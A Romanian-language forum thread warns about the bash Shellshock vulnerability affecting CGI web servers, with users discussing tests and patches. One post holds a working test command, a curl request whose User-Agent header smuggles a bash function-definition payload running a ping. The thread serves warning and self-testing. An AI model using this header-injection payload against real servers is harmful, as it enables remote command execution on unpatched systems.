Warning - bug in bash

Jaffar

Wizard
Detalii. Se pare ca a iesit un patch care poate fi bypassed, deci e naspa.
In cateva cuvinte, orice server *nix care are default shell - bash si are un server de http portit cu mod-cgi este vulnerabil.

L.E. Testat la mine pe un server de test:
curl -k -H 'User-Agent: () { :;}; /bin/ping -c 1 someip' http://localhost

Atat de simplu :D
 
Last edited:
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>

Ok.. Asta ce inseamna :D ?
 
What do I care, și așa se laudă hostingul cu securitate paranoică (de câteva ori mai mult m-a încurcat decât să fie realmente utilă), să fie și ei pe fază că de-aia e jobul lor.
 
Nope, dupa ce rulez ce ai zis tu, imi varsa exact textul pe care l-am scris (in ecran).
Deci nu executa. Bun. Oprim apache-ul si ssh-ul si continuam linistiti treaba.
 
Am rezolvat unul din Macurile din casă cu un update la bash, pare-se că nu îi vulnerabil și oricum cică Macurile nu-s vulnerabile decât dacă ai ceva setări custom, ceea ce nu-i cazul :D

RHEL pare să fi fost fixed.

NSA/tinfoil hat on?
 
Back
Top